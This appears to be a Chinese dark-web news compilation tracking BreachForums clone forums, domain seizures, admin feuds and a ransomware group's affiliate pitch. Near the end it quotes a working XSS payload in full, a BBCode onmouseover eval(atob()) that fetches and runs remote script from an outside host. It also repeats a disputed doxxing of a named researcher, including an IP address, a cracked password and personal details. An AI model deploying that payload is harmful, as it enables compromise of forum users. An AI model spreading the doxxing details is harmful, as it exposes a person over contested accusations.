4月初,“暗网下/AWX”曾报道冒牌Shinyhunters推出了又一个山寨BreachForums,6月1日,该山寨BreachForums宣布与暗网勒索软件团伙ShadowByt3$达成合作关系,而ShadowByt3$也在其暗网泄密网站替这个山寨BreachForums进行推广宣传,然而,仅仅过了一天,这个版本BreachForums的2个明网域名都被查封。
本站(anwangxia.com)多次介绍,由于多个版本的BreachForums的源代码与数据库均已经泄露,也就意味着谁都可以搭建属于自己的BreachForums,从而导致了暗网里出现了多个版本的的山寨BreachForums。
ShadowByt3$是最新出现的一个比较活跃的勒索软件团伙,今年来已经发布了10个受害者,包括2月份的UMSA、5月份的Hotelogix、University Of Georgia、Amplify Technology、Stride Learning、PowerCampus、StarBucks Company(StarBucks.com)、Hotelogix Company(Hotelogix.com)以及六月份的Cropwise(Syngenta Group)、Lead Company(Leadership Boulevard)。
勒索软件团伙ShadowByt3$宣布“BreachForums回来了” 6月1日,勒索软件团伙ShadowByt3$在其暗网泄密网站发布公告称:BreachForums is Back (breachforu[.]ms),公告中,该勒索软件团伙写道,这并非泄密,只是一个公告,该公告将持续展示,直到他们决定结束推广为止。
ShadowByt3$称,可能有人好奇为何会出现BreachForums的标志,之所以有标志,是因为该勒索软件团伙已与BreachForums达成了合作协议。ShadowByt3$形容这个BreachForums平台看起来很正规,勒索软件团伙DragonForce也曾为其做过推广。既然DragonForce推广过他们,因此他们也决定推广。
该勒索软件团伙表示,虽然目前存在许多山寨站点,但如果其他团队都在那里,那应该就是正规的。自BreachForums创立之初,该团伙就一直支持BreachForums,并愿意竭尽全力助其重振旗鼓。从今天起,该团伙将为这个BreachForums推广一个月,且将在他们的同意下延长推广期。并请大家去看看,注册账号,希望大家都加入。
ShadowByt3$称将与BreachForums共同承担风险,但就目前来看,该平台是合法的。至于BreachForums的克隆站点,那是一段漫长的故事,要解释清楚恐怕要花上很长时间。
BreachForums也发布公告称与ShadowByt3$达成合作关系 BreachForums在论坛发布公告:“ShadowByt3$ 2.0 X BreachForums X VULNS”,公告表示,很高兴宣布,已与一家新兴的“数据勒索即服务”(Data Extortion-as-a-Service)组织——ShadowByt3$ 2.0——达成另一项战略试用合作。
公告写道:“您是否掌握了企业数据,却苦于无法将其变现?让ShadowByt3$为您代劳勒索事宜!ShadowByt3$提供了一个平台,联盟成员可在该平台托管窃取的数据,而ShadowByt3$运营团队将负责与受害组织沟通并实施勒索行动。”
公告还称,联盟成员将获得专属控制面板以管理整个运营流程,收益分成比例起始为70%。若想成为联盟成员,需通过面试审核,并给出了一个暗网网址用于提供高质量的泄露数据。
BreachForums发布声明宣布明网域名已经被暂停访问 BreachForums称注意到其明网域名(breachforu[.]ms)已被暂停,最近几天,breachforums[.]rs和breachforu[.]ms都因竞争对手的攻击而被暂停。
声明称,前ShinyHunters成员Yukari每天坐在办公桌前,使用其入侵的警方邮箱不断发送请求,要求关闭BreachForums的明网域名。她一定是精神彻底崩溃了,因为BreachForums永远不会关闭,他们正在迁移到更优质的顶级域名(TLD):breachforum[.]st将成为BreachForums的新主域名,将在24小时内上线并进行重大更新,并还将在不久后发布.su及其他防弹顶级域名的镜像站点。
声明同时表示,BreachForums正在采取一切必要措施,确保此类事件不再发生。尽管如此,他们还是对这些事件深表遗憾,并为给用户带来的不便致以诚挚歉意。BreachForums也在积极筹备ShinyHunters的明网付费或泄露网站,该网站将在今天或24至48小时内上线。
BreachForums称其与ShinyHunters的合作伙伴关系以及各项赞助将不受任何影响地继续进行,BreachForums将比以往任何时候都更加强大。没有什么能阻止BreachForums。感谢大家的耐心等待。
这个自称ShinyHunters冒牌者究竟是谁,期待警方的执法行动来解释,“暗网下/AWX”将持续关注。
更多暗网新闻动态,请关注“暗网下/AWX”。
近期,一个暂时活着的BreachForums突遇变故,其创始人HasanBroker遭受该论坛的其他管理员背刺。论坛的其他几位管理员抢走论坛的明网域名、论坛数据库与源代码并另立门户,虽然后来HasanBroker成功夺回明网域名,但已经改变不了其BreachForums论坛已经易主的事实。不过HasanBroker表示,他正在创建新的BreachForums论坛。
HasanBroker称BreachForums的其他几位工作人员背叛了他 5月20日,HasanBroker在其Telegram频道发布公告称,昨天在其外出途中,BreachForums论坛的管理员Diencracked、Resolute以及其他几位工作人员背叛了他,为了谋取私利和满足贪欲,他们把一切都毁了。
HasanBroker表示,可以想象,无论是从情感层面,还是从恢复论坛的角度来看,他都深受伤害。但他向大家保证,最多48小时到一周内,他就能恢复并解决所有问题。因为这种情况他以前也遇到过,也成功恢复了,这次一定同样能做到。
HasanBroker称,他提拔了Diencracked,Diencracked所拥有的一切都是因为他,而Diencracked的作用微乎其微。如果有论坛用户认为Diencracked是个能干的领导者,能为大家带来光明,那就错了,Diencracked却为了钱背叛了他和那些信任他的人,
HasanBroker还表示,他已成功恢复了所有数据,包括服务器和所有信息——但在重新评估所有选项并为平台建立更稳固的基础之前,他会暂时关闭论坛。
随后,HasanBroker称,他还成功恢复了BreachForums明网域名breached[.]st的控制权,其域名已经完成了KYC认证,而背叛者们现在无法掌控该域名。HasanBroker感谢大家在这段艰难时期陪伴左右,感谢了Spear、PwnForums以及所有支持他的人,还有其视若珍宝的忠实粉丝们。
Diencracked已经成为BreachForums新的创始人 在原先的BreachForums里,Hasan和Vect已被清除。Diencracked与LAPSUS$、TeampPCP、GhostSec、Resolute和Shinigami共同接管了论坛的领导权。
Diencracked发布公告称,HasanBroker已经结束,虽然原明网域名breached[.]st还能使用,但即将迁移至新的明网域名breached[.]su,希望大家更新书签。
HasanBroker控诉Diencracked,并表示新论坛正在开放 HasanBroker继续在其Telegram频道发布新的公告称,他在一年前这个时候创办了BreachForums,直到大约8个月后,Diencracked主动联系他加入,他才知道Diencracked的存在。
HasanBroker表示,希望Diencracked知道,他曾把Diencracked当作亲兄弟般爱护——任何和他共事过的人都能证明这一点。但是Diencracked背叛了他,背叛了论坛成员们,还背叛了整个论坛。
HasanBroker说:
这不是你第一次对我做出这种事了。我祝你生活顺利,但我绝不会坐视你像对我那样坑害其他人。
你知道自己是个毫无价值、毫无尊严的叛徒。当你绝望、自杀倾向、孤立无援地来找我时,我在你人生最低谷时陪伴着你。你为了一个我本打算送给你的论坛而失去了我,现在你一无所有了,因为你暴露了真面目。
HasanBroker称,无论白天多忙,都会回复每一位成员的私信,都尽可能满足每个人的请求,尽管自己也并非完美无缺——他深知人无完人,但他绝不会为了金钱或社区声望而背叛朋友,更何况这里的荣誉唯有清白才能赢得。
HasanBroker保证,在困难时期,领导者从未抛弃大家,他将会尽最大努力,战斗到底。
HasanBroker透露,他组建了一支由开发者和所有者组成的小队,正致力于BreachForums与DoxByte两个项目。其中BreachForums依旧使用XenForo平台,正在全面重建前端界面。因为他和新加入的开发团队对旧版前端界面的外观并不满意,而且他们认为之前的开发者过度依赖人工智能,导致界面设计得十分糟糕。
公告显示,新的BreachForums论坛已经做出设计调整,前端界面已经发布,让论坛看起来不像个2022年风格的论坛。HasanBroker保证新论坛将在三周内发布。
对此,“暗网下/AWX”认为,当前的暗网社区运营更像似联合国安理会对世界的治理,从以前的单一管理员运作走向了多元管理,而争议就在利益冲突中产生。HasanBroker新开发的BreachForums何时诞生,本站将持续关注。
更多暗网新闻动态,请关注“暗网下/AWX”。
根据PwnForums论坛发布的耻辱墙公告以及X账号@IntCyberDigest的爆料,社交媒体和黑客社区的不同消息来源将保加利亚网络安全专家Angel Tsvetkov与BreachForums的管理员联系起来。BreachForums是买卖被盗数据的主要平台之一,当前主要有三个版本的BreachForums在运营,这里所指的BreachForums是Indra版本的BreachForums。
2026年3月15日,Indra的BreachForums暗网论坛突然无法访问,身份不明的管理员选择关闭了该网站,后来证实这是一起退出骗局。不过,当时网络反情报威胁调查联盟(CCITIC)声称对此事负责。
在Indra的BreachForums论坛关闭了十天后,论坛管理员之一“N/A”使用今年2月份的备份,通过新的域名BreachForums[.]sb重新启动该论坛,这次使用的管理员新化名是“Caine”。两天后,其他工作人员确认Caine就是之前卷款跑路的那个人,之后整个管理团队选择集体辞职。由于没有版主,“N/A”再次尝试出售该论坛的基础设施,此后大概是被DarkForums的Knox买走。
PwnForums称,这并非“N/A”首次犯案,在他担任管理员期间,“N/A”一直通过二级账户进行托管诈骗,兜售他并不拥有的数据库,收取款项却不交付任何产品。他还拖欠与他达成协议但从未履行义务的各方款项。
事件发展的时间线 2026年3月15日:BreachForums论坛无法访问,后经内部讨论,被描述为管理员主导的破坏活动。 2026年3月25日:据报道,BreachForums以“Caine”的化名重新启动,据称使用了之前的备份。 2026年3月27日:管理团队声称“Caine”和“N/A”是同一个人,整个管理团队集体辞职。 3月27日之后:据称管理员试图转移或出售论坛控制权。 被暗网论坛PwnForums钉上耻辱墙上的N/A究竟是谁 PwnForums已确认N/A为安吉尔·茨韦特科夫 (Angel Tsvetkov),他是一名保加利亚网络安全专家、渗透测试员和漏洞赏金研究员,拥有渗透测试和漏洞研究背景。他以其在识别和负责任地披露全球主要平台漏洞方面的工作而闻名。他在HackerOne和Intigriti等平台上享有盛誉,曾报告过影响大型企业的漏洞。他的工作主要集中在Web应用程序安全、漏洞发现和对抗性测试方面。
PwnForums称,Angel Tsvetkov是一位认证的道德黑客,HackerOne会员,曾因负责任的信息披露而获得哈佛大学、福特汽车公司、博世、BBC和OLX等多家企业机构的致谢,并曾荣获新闻媒体BBC和安全公司ESET的多项嘉奖。
然而,他表面上是一名白帽黑客,实际上却运营着最大的数据交易论坛,他同时是暗网论坛BreachForums的管理者,对论坛用户进行托管诈骗,两次卷款潜逃,并试图出售一个并非属于他的论坛。事实证明,道德黑客“负责任的信息披露”是有选择性的。
真实身份是如何关联出 PwnForums称,该归因得到了许多技术证据的支持,例如个人帐户和非法活动之间重复使用IP地址和登录密码,并得到@IntCyberDigest等X用户的认可。
从邮箱进行关联,Angel Tsvetkov一个常用的匿名邮箱为[email protected],常使用用户名SecPentester1337与secpente123,在RaidForums、Cracked.to、Dedicatet.com和Altenen等多个网络犯罪论坛注册了账号,填写的出生日期为1993年1月28日,另外在RaidForums论坛上还有一个用户名Vojilion9292与同一邮箱关联。
此外,[email protected]邮箱还关联了一个Twitter账号,注册于2018年9月29日,账号名为“Peter”,用户名为@Peter00111Peter,所在地为保加利亚,个人简介为:“渗透测试/漏洞猎手/道德黑客”。此人在多个正常论坛上使用多个名字,所有名字都与同一个电子邮件地址关联,所有地址都指向保加利亚普罗夫迪夫。
从密码进行关联,N/A的论坛账户密码被破解出来是“Awdawd123!”,然而有趣的是,Angel Tsvetkov个人网络安全咨询公司的官方商务邮箱[email protected]也反复使用同一个密码。
PwnForums感叹,这位获得认证的道德黑客、HackerOne会员、曾为多家机构提供密码安全咨询的人士,竟然在犯罪论坛账号和自己的商务邮箱中重复使用同一个密码。
从IP进行关联,N/A曾使用过的IP地址中有一个是78.130.187.42,该IP地址曾用于登录RaidForums和Cracked等论坛,该IP地址的地理位置位于保加利亚普罗夫迪夫。
无语的是,N/A曾联系PwnForums吹嘘其在该论坛植入后门并上传了一个名称为nike-sh.txt的文件,后该论坛管理员查看nike-sh.txt的访问日志,有且仅有一个IP:78.130.187.42,PwnForums认为Angel Tsvetkov通过自己的家庭IP地址访问了这个文件。
道德黑客Angel Tsvetkov驳斥了这些指控,称其“不实” 然而,保加利亚网络安全专家安吉尔·茨韦特科夫(Angel Tsvetkov)在接受采访时,断然否认了有关他是知名网络犯罪论坛BreachForums管理员的指控。茨韦特科夫称,散布的数据“是虚假的,而且极具破坏性”,并声称这些数据是基于“来自与网络犯罪相关的来源的未经证实的说法”。
当被直接问及他与该平台的所谓关联时,这位道德黑客坚称他没有参与BreachForums论坛的管理或运营,并否认拥有与网络犯罪活动相关的账户或化名。他表示:“我与相关人员没有任何关系,也从未在这些论坛担任过管理员或任何类似职务。”
关于他的身份与网络安全社区内这些活动之间的关联,这位专家指出,他并不清楚第三方是如何在未经授权的情况下使用他的数据的,并澄清说他目前正在分析情况。“我不知道第三方是如何在未经我授权的情况下在这个论坛上使用我的身份和数据的,”他表示。
这位专家在最初的沟通中坚称,已发布的信息“并不反映现实”,并警告说,信息的传播可能会产生影响。
“由于这篇文章的发表,有关我的虚假信息正在传播,执法部门和其他第三方也能看到这些信息,”他指出。
BreachForums论坛是一个为黑客及网络犯罪分子提供买卖被入侵数据库、黑客工具以及分享网络犯罪知识的暗网平台。与BreachForums论坛相关的各种戏剧性事件层出不穷,而且愈演愈烈。尽管屡遭执法部门的打击,偶尔还会发生内部冲突,但专注于买卖数据泄露的论坛仍然不断涌现。
“暗网下/AWX”梳理了近期Indra的BreachForums的变迁,在其关闭BreachForums之后,BreachForums[.]sb经过了几轮变化,先是被@Caine持有并继续运营,之后该论坛的管理团队集体退出。后明网域名BreachForums[.]as与BreachForums[.]sb被DarkForums的Knox买走,而据称是冒牌的Shinyhunters又开设了一个新明网域名BreachForums[.]ai来运营新版本的BreachForums。
Indra的BreachForums的工作人员集体辞职 @paw(@pine)在BreachForums[.]sb发布公开声明表示,BreachForums[.]sb的6名工作人员(@pine、@Loki、@888、@Tanaka、@paw、@Addka72424)已辞职,并声明:“请勿信任任何新出现的或现有的克隆站点,BreachForums这个名字已经不复存在,且永远不会回归。”
对此,在Telegram上假冒Shinyhunters的管理员@Caine声称,旧论坛的工作人员退出,是因为“勒索”。这些版主要求以1000美元的门罗币作为报酬,以补偿他们所做的一切工作。在被他拒绝后,他们选择了离开。而论坛将会组建新的工作人员团队。
BreachForums[.]as与BreachForums[.]sb显示了新的提示信息 “暗网下/AWX”尝试访问BreachForums[.]as与BreachForums[.]sb这两个明网域名,两个网站均显示相同的界面UI风格,一眼可以看出显然属于同一个所有者。
BreachForums[.]as网站展示了BreachForums[.]sb的明网域名与暗网域名:
BreachForums[.]sb则称,BreachForums现已完全由Knox(knox.hn)掌控。所有数据(包括最新的数据库和源代码)均已得到妥善保管。不再有混乱和诈骗,不再有不确定性——一切现已实现集中管理。请勿信任任何克隆站点。并提供了Telegram联系方式。
上周重启的一个新BreachForums论坛 周一,一名自称是勒索组织ShinyHunters成员的人宣布重启运营一个新的的BreachForums论坛(BreachForums[.]ai)。但一位与ShinyHunters官方频道有关联的人士表示,该组织与BreachForums的任何重启都毫无关系。他们表示:“我们与那个论坛没有任何关系。自从2025年10月10日被FBI查封后,我们就再也没有重启过它。”
本周重启的BreachForums论坛是“暗网下/AWX”前期介绍的Indra的BreachForums论坛的延续,上个月,Indra的BreachForums论坛的“基础设施,包括完整的数据库和源代码”,被“直接从其托管服务器”黑客入侵,并以1万美元的价格出售。新BreachForums论坛管理员(化名“x”)表示,前任管理员“N/A”得知此事后“惊慌失措,带走了能带走的东西,然后立即离开,没有通知社区”,之后“数据库就落入了不明人士手中”。
这一惊慌失措的说法似乎指的是3月16日发布在论坛旧版本上的一条公告,该公告宣布“BreachForums已死”,并正在寻找新的管理团队。公告表示:“我们现在正在寻找一位负责任的个人或团体,愿意接管论坛的领导权并继续提供支持。”
除了ShinyHunters的官方否认之外,安全研究人员还详细列举了“x”的说法中的矛盾之处,暗示其内容不实,并表示一些合法的BreachForums前运营者似乎正在注册多个BreachForums域名,以阻止类似的重启声明出现。
ShinyHunters表示,此次重启是利用先前泄露的数据发起的一系列BreachForum虚假论坛中的最新一起。该组织的一名成员说道:“其他威胁行为者能够恢复一个外观相似的合法论坛,包括重新导入旧用户数据,其中也包括我自己的ShinyHunters账户。”
IntelOpsV3称冒牌SH推出的BreachForums论坛又是一个冒牌货 暗网情报研究者@IntelOpsV3称,在Indra关闭其BreachForums并实施“卷款跑路”的时候,一个冒牌的SH(Shinyhunters)带着另一个冒牌的BreachForums(BreachForums[.]ai)出现了。于是,几乎在同一时间,至少有3个一模一样的网站,都声称自己是真正的BF。但不知道这些所谓BreachForums能运营多久。
新BreachForums论坛使用了暗网域名:http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd[.]onion
@IntelOpsV3提醒,其正在密切关注所有新的BF克隆站点,请谨慎对待所有这些新克隆站点。因为原BreachForums的PGP密钥、网站代码和数据库都已泄露,是时候让Breachforums这个名字长眠了。
@IntelOpsV3称,这是新的BF团队,可以看到他们在TG上假扮成“Shinyhunters”,他们声称自己是唯一的正宗BF,他们还发布了一则警告,称其他克隆站点均为假冒。这个新冒出的BreachForums克隆站点由doxeur、kiroshell和breach3d所有。breach3d就是那个发布假Dell数据库的冒牌Shinyhunters。
但可惜的是,SLSH已经发布了BFv5数据库,并指认他们是冒牌货。真正的SLSH称:“目前所有的论坛都是假的 [ .sb .ac .fi .bf .us 等],如果它们继续存在,我们将泄露所有BF的备份。因为我们掌握了所有MyBB 1.8版本的漏洞利用代码。”
@IntelOpsV3称,这个论坛是假的。这个论坛的ShinyHunters是个冒牌货。他们冒充IntelOps、Pine、Loki等组织,正如你们从我们的推特帖子中看到的,这个论坛里充斥着各种角色扮演。
BreachForums[.]ai的管理员“x”发布公告驳斥@IntelOpsV3 BreachForums[.]ai的管理员“x”于4月2日发布公告进行回应,并澄清该论坛的现状。“x”表示,他们没有导入旧BreachForums的SQL数据库,并不意味着他们是蜜罐(honeypot)或退出骗局(exit scam)。他自称这是一个全新的开始,这是BreachForums的官方延续。并请大家在做出假设前,先进行适当的研究,不要基于不完整的信息下结论。
公告表示,他们理解大家的怀疑,但事实不会改变。一旦论坛完全开发并稳定下来,他们将对克隆站点采取行动。“x”称,一些来源(如 Twitter 上的 IntelOps (@intelopsv3))散布了虚假信息,声称其是退出骗局。这些说法是错误的。IntelOps有历史性地不经查证就发布信息,并经常误报或歪曲细节。
“x”称,他们鼓励大家保持信息灵通、核查事实,并避免匆忙下结论。他们不是蜜罐/退出骗局。
公告表示,如果是蜜罐,他们会尝试修改MyBB源代码来尽可能记录用户的信息。相反,他们移除了IP记录,并用自定义构建的垃圾邮件预防系统取而代之。即使FBI或任何执法机构查封后端服务器也找不到任何有用的东西。
“x”宣称自己的VPS是完全加密的,用户的隐私是优先事项。
SLSH冒牌者究竟是谁 独立安全研究人员Ryan Moran(@rmoskovy)表示,在对这位自称“ShinyHunters”冒牌者进行分析时,我使用一个假账号通过Telegram向其发送消息,声称需要向“Rey”(一名与SH/SLSH有关联的威胁行为者)偿还一大笔钱,并要求对方提供“Rey”的联系方式。
然而,对方非但没有提供“Rey”的联系方式,反而要求@rmoskovy直接向其汇款。当进一步追问时,对方发来了一个拼写错误的账号,该账号是“Rey”真实用户名的拼写变体:
2026-02-26 -> Qilin 2026-02-26 -> Rey 2026-02-20 -> Qiliin 2026-01-24 -> XiaoBtc ( MBTC ) 2025-12-24 -> MBTC 2025-12-24 -> Crimesite 2025-11-08 -> Bjorka 2025-11-04 -> NinjaBoi6890 2025-10-31 -> SkyHunters 2025-10-25 -> Asley 2025-09-10 -> Kimbo 2025-06-09 -> Bebale Office 2025-05-15 -> Lesley
本月初,“暗网下/AWX”曾报道,两个版本BreachForums论坛的多个明网域名遭执法机构查封。本月中旬,由Indra运营的暗网数据泄露论坛BreachForums遭遇了长期停机,明网网站无法正常访问,暗网网站提示“Onion site not found”。前端仍正常运行,但后端已无响应,基本可以确定其背后的基础设施出现了问题,而非黑客攻击或计划内维护。
虽然BreachForums管理层表示这只是例行维护,但据威胁情报专家猜测,可能有两项协同行动针对该论坛:一是由LAPSUS$与HasanBroker共同宣布的“Operation Lebensraum”联盟,明确以“抹除Indra及其BreachForums论坛”为目标;二是“网络反情报威胁调查联盟”(CCITIC),一家调查网络威胁以协助当局的非营利组织,该组织声称是他们攻击了Indra的BreachForums。
经“暗网下/AWX”长期坚持跟进与持续跟踪报道,可以看到BreachForums数据泄露论坛有着混乱的黑暗历史:多次遭FBI查封(2023–2025年)、大规模数据泄露(2026年1月有32.4万用户信息曝光)、疑似蜜罐的重新启动、多次域名被查封后重新启用新域名……自2022年以来,BreachForums历经多次FBI查封仍存活至今,每次被关停后都会更换顶级域名(.st ➡️ .cx ➡️ .is ➡️ .vc ➡️ .hn ➡️ .as…)。
这次不管是谁的努力,瘫痪了Indra的BreachForums论坛,则为其竞争对手HasanBroker版本的BreachForums论坛铺平了道路,该版本自诩为合法继承者,且正获得越来越多的支持。
“暗网下/AWX”继续追踪分析后基本确认,Indra版本BreachForums的关闭,既非黑客攻击,也非例行维护——而是被强制下线。网络反情报威胁调查联盟(CCITIC)成功关闭了Indra的BreachForums论坛,Indra被迫发布一则告别公告,但该公告目前已经不可见。
Indra的BreachForums论坛在CCITIC的持续努力与施压下关闭 根据CCITIC官网的介绍:
网络反情报威胁调查联盟(Cyber Counter-Intelligence Threat Investigation Consortium)是当今互联互通的数字环境中,抵御不断演变的网络威胁的一座协作堡垒。
本组织汇聚了网络安全专家、研究人员和分析师,共同构建统一的防御网络。依托自主研发的平台和集体智慧,我们在威胁危及关键基础设施之前,便能对其进行识别、分析并予以消除。
CCITIC宣告, BreachForums.as已下线——CCITIC成功将其击溃。其在领英上发文称,该域名breachforums[.]as是这个臭名昭著的网络犯罪论坛在明网上的最新版本,目前无法访问。这不是系统故障,而是被强制下线。
CCITIC表示,他们已成功定位到BreachForums背后的上游服务器,这些服务器均托管于DigitalOcean(ASN 14061)位于法兰克福数据中心的机房。随后,该组织提交了多份滥用报告(由于DigitalOcean要求每个 IP 地址提交一份报告,因此不得不提交了三份完全相同的报告),美国云服务提供商DigitalOcean终止了对这些服务器的服务。
🖥️ 已确认的服务器IP:
🔹 164.90.223.186 — 与 breachforums.as 域名直接关联
🔹 138.68.73.155
🔹 68.183.223.214
CCITIC于2026年3月6日扫描时,确定这些服务器拥有相同的技术指纹:WSGIServer/0.2、CPython/3.12.12、端口 3093、TLS 1.3。
2026年3月12日,CCITIC向DigitalOcean安全运营中心提交了滥用报告后,该托管服务商审查了CCITIC的报告,并对与BreachForums基础设施(breachforums[.]as)相关的账户采取了行动。
Indra发表告别信后选择转移资金退出 随后,访问Indra的BreachForums论坛,跳转至:https://breachforums[.]as/info/download.php,并显示一封告别公告:
亲爱的世界,
是时候向大家告别了——尽管并非彻底的告别。
BreachForums 早已不仅仅是一个平台;它是一个社区,在许多方面,更是一项你们每个人都理解并为此贡献力量的共同使命。
在过去的几个月里,我竭尽所能帮助这个社区重振旗鼓并日益壮大,我坚信这里所建立的一切将会继续存在并不断发展。
然而,此刻我必须退居二线。我个人生活中一些重要且迫切的事务需要我投入精力,其中包括一项新事业的启动。尽管如此,只要条件允许,我仍会尽我所能继续支持 BreachForums。
因此,我们现正寻找一位负责任的个人或团队,接手论坛的领导工作并提供持续支持。
现任版主团队将保持不变,并继续履行其一贯职责:Loki、Tanaka、888 和 Pine。
我们期待就论坛的未来展开严肃而认真的讨论。
如有兴趣,请通过以下渠道联系管理团队:
Session: 054d67e476285098efb2bbe770d205588b6639c5af9157edf138b630cd53109723
TOX:D1E8EB300080486048B366464BD5D57C86D6FA8234E784714541BAEAFB64FC6A7CCD72D7F819
— BreachForums 管理团队
RaidForums、BreachForums都是曾经臭名昭著的暗网数据泄露论坛,提供被盗数据发布与交易的平台。近些年,在美国联邦调查局、国际刑警组织、欧洲刑警组织等国际执法机构的努力下,几个暗网数据泄露论坛被打击了多次。
目前仍然还存在且在暗网与明网可以同时访问的暗网数据泄露论坛还剩:两个版本的BreachForums(Indra的BreachForums与Hasan的BreachForums)、BreachForums的最大竞争对手DarkForums,这些论坛除了面临竞争对手的挑战,还得面对在执法机构的查封压力。
近期,执法机构采取密集行动,查封了三个暗网数据泄露论坛的多个域名。随后这些论坛迅速响应,启用了新的明网域名。“暗网下/AWX”整理了这几个论坛的明网域名更迭记录。
Indra的BreachForums的明网域名更迭 2025年12月,在多个版本的BreachForums被执法机构摧毁后,Indra推出了新的BreachForums论坛,明网域名为breachforums[.]bf。
2026年2月4日,breachforums[.]bf域名遭受据称HasanBroker等的社会工程学攻击,被暂停解析,暂停期间,Indra的BreachForums迅速启用了新的明网域名breachforums[.]jp。后Indra设法找回了bf域名,并恢复使用了bf域名,随即jp域名被放弃使用。
2026年2月,安全研究人员多次研究出breachforums[.]bf的真实IP,分别为:95.129.233.76、185.129.102.34、31.172.87.150。
2026年2月14日,breachforums[.]bf域名再次被暂停解析,这次疑似是真被执法机构查封,并同时查封了breachforums[.]jp域名。
同日,Indra的BreachForums又一次迅速启用了新明网域名breachforums[.]as,并发布公告称,此次纯属注册商单方面暂停服务,与BreachForums内部运营无关,系统安全状态完好无损。未发生任何安全事件,未出现数据泄露,其基础设施、服务器及数据均未受影响。
Hasan的BreachForums的明网域名更迭 2026年1月,原BreachForums的管理员HasanBroker推出了另一个新的BreachForums,明网域名为breachforums[.]cz。2026年2月12日,有安全研究人员分析出该域名的子域名mail[.]breachforums[.]cz背后的真实IP为176.123.2.86。
2026年2月20日,breachforums[.]cz域名被执法机构查封,虽然依然能打开,但是访问时提示“Page could not be loaded”。在breachforums[.]cz域名被查封后,Hasan的BreachForums启用新明网域名breachforums[.]in为其主域名。
DarkForums的明网域名更迭 2025年,暗网出现一个新的数据泄露论坛DarkForums,成为BreachForums有力的竞争对手。DarkForums使用明网域名darkforums[.]st。
安全研究人员分析出了darkforums[.]st背后的IP:185.178.208.177,185.11.145.145, 185.11.145.254,185.196.9.155,85.208.156.120。
2025年12月,DarkForums启用新的明网域名darkforums[.]io,2026年1月,有安全研究者称该域名背后对应的真实IP有185.208.158.89、185.178.208.154。2026年2月4日,darkforums[.]io域名被执法机构查封,无法访问。
2026年2月4日,darkforums[.]io域名被查封后,DarkForums启用明网域名darkforums[.]me为主域名,该域名是DarkForums之前就持有的备用域名。当时DarkForums的所有者Knox发布带有PGP签名的论坛公告宣布“Official Domains – Old Mirrors Disabled”:
—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA256
All previous domains and mirror links have been permanently disabled by the providers and are no longer active.
Please update your bookmarks. The only official addresses going forward are:
Clearnet: https://darkforums.me
Onion (Tor): http://darkfoxaqhfpxkrbt7vxns2z2u2k72sgmqbzeorupaiottw3ecm2wgyd.onion
We will announce and list any new mirrors here as they are added.
自从多次重启后的BreachForums论坛被FBI查封之后,暗网先后出现了两个名为BreachForums的论坛,一个是Indra的BreachForums[.]bf(管理员Indra与N/A),一个是Hasan的BreachForums[.]cz(管理员HasanBroker与breach3d)。这两个论坛的诞生注定会硝烟四起,BreachForums克隆论坛之间的一场战役正在打响。
“暗网下/AWX”此前跟踪报道,Indra的BreachForums[.]bf于2025年12月诞生,使用MyBB搭建,通过投放.fr域名数据库并伪造政府邮箱宣布论坛成立,宣称自己才是真正的官方BF论坛;Hasan的BreachForums[.]cz于2026年1月出现,使用XenForo搭建,称自己才是正统,目前已吸引逾1400名成员加入。
近期,这两个BreachForums论坛的战争进入了白日化阶段,先是BreachForums[.]bf域名被社会工程学攻击后被暂停,其次BreachForums[.]cz论坛也遭受了短时间的跨站脚本(XSS)漏洞攻击,整体而言,Hasan的BreachForums[.]cz略占上风。
BreachForums[.]bf域名丢失后又被找回 2月3日,BreachForums[.]bf域名突然被域名注册商暂停访问,其管理员N/A发布公告,紧急启动BreachForums[.]jp域名来替代访问。同时,Hasan在BreachForums[.]cz发布主题“Takedown of the Fake Clone”(拿下仿冒克隆),并表示正在使用SQL注入、跨站脚本、SSRF请求等诸多漏洞进行攻击。
2月8日,访问BreachForums[.]bf,显示异常的篡改消息以及倒计时,暗示该平台可能遭遇安全事件或系统入侵。界面显示了以下内容:公开倒计时、泄露的个人图像、提及涉嫌犯罪活动及执法部门的签名声明、与论坛常规运营通知无关的声明。
根据暗网研究专家IntelOps(@IntelOpsV3)发布的消息,有黑客窃取某西非国家政府邮箱后,通过社会工程手段诱使域名注册商暂停了BF域名。域名注册商将技术援助请求转交布基纳法索的ABDI机构作为主管当局寻求协助,但技术援助集体成功推动其采取行动。
据称,Hasan在该域名被删除后成功注册该域名,并在2月8日发布了篡改页面。但Indra最终说服注册商该举报属虚假信息,重新夺回BreachForums[.]bf域名控制权,并发布公告恢复该域名的使用。
BreachForums[.]cz网站被篡改后快速恢复 2月5日,BreachForums[.]cz网站曾遭遇了一次跨站脚本(XSS)漏洞攻击,短暂遭到篡改,疑似因为XenForo存在跨站脚本漏洞。Hasan发帖解释,该XSS漏洞可利用性源于XenForo解析BBcode的机制,属于原生漏洞即零日漏洞。
该Payload利用JavaScript的eval函数实现Base64编码的解码功能(部分依赖混淆性安全机制)。通过atob函数解码后,得到以下在鼠标悬停时触发的JavaScript有效载荷:
(async() => {
var u = "https://breachforums.pathetic.wtf/server.php?get=payload";
var r = await fetch(u);
var t = await r.text();
eval(t);
})() Payload如下:
'c': ['https://breachforums.pathetic.wtf/server.php', "[table width=\"100%' onmouseover='eval(atob("KGFzeW5jKCk9PnsgICAgIHZhciB1ID0gImh0dHBzOi8vYnJlYWNoZm9ydW1zLnBhdGhldGljLnd0Zi9zZXJ2ZXIucGhwP2dldD1wYXlsb2FkIjsgICAgIHZhciByID0gYXdhaXQgZmV0Y2godSk7ICAgICB2YXIgdCA9IGF3YWl0IHIudGV4dCgpOyAgICAgZXZhbCh0KTsgfSkoKQ=="))'\"] [tr][td]click here and you will be entered into the giveaway[/td][/tr] [/table]", 0x1, "credits giveawayy", 0x0, 0x1964, 'setTimeout', 0x2, "\n<head>\n <meta charset=\"utf-8\">\n <title>owned</title>\n <style>\n body { margin: 0; padding: 0; height: 100vh; background: #000; color: #ff00aa; font-family: 'Courier New', Courier, monospace; display: flex; align-items: center; justify-content: center; text-align: center; overflow: hidden; }\n .
自从后缀为bf的新BreachForums出现后,原BreachForums的管理员HasanBroker一直表示该BreachForums(breachforums[.]bf)系冒牌货,并称自己将努力恢复真正的BreachForums,并重塑辉煌。终于在1月17日,HasanBroker在其Telegram频道宣布了另一个新BreachForums的诞生,开放邀请大家注册。
